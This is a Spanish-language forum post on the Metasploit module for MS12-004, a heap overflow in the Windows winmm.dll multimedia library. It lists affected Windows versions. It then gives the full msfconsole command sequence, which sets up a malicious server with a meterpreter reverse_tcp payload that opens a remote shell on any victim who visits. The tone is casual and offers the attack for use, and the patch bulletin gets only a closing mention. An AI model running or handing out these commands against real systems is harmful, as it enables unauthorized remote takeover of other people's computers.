MS12-004 Exploit para windows

El MS12-004 es el modulo (exploit) incluido en metasploit que explota un problema de desbordamiento (heap overflow) en la libreria winmm.dll (libreria de multimedios de windows). WTF??? en síntesis, corres el exploit, la victima ingresa al servidor que se crea y logras abrir una sesion, lo que te permite ejecutar comandos remotamente con los privilegios que tenga la victima en el momento de entrar al servidor. FECHA DEL EXPLOIT: 27/01/12 (BASTANTE NUEVITO ) Autores del exploit: Shane Garrett juan vazquez sinn3r Sistemas operativos afectados: Windows XP SP3 Windows XP Media Center Edition 2005 SP3 Windows XP Professional x64 Edition SP2 Windows Server 2003 SP2 Windows Server 2003 x64 Edition SP2 Windows Vista SP2 Windows Vista x64 Edition SP2 Windows Server 2008 for 32-bit Systems SP2 Windows Server 2008 for x64-based Systems SP2 Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1 Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1 Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1 Comandos: use exploit/windows/browser/ms12_004_midi set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit Igual que cualquier exploit de metasploit Un video de como explotan un Windows XP link: http://www.youtube.com/watch?v=TxmqMiQqCmY A mi me funciono che... ACLARACION 1: SI NO ENTENDISTE NADA, ACA TENES EL TUTO MAS COMPLETO DEL TEMA, VALE LA PENA!! http://www.metasploit-es.com.ar/wiki/index.php/Curso_de_Metasploit_Unleashed_en_Espa%C3%B1ol ACLARACION 2: LO PONGO EN ESTA CATEGORIA PORQUE ME PARECE QUE SE ADECUA MAS QUE EN LAS OTRAS En la fuente dejo el boletin oficial de windows al respecto para quienes aun no actualizaron sus servidores o clientes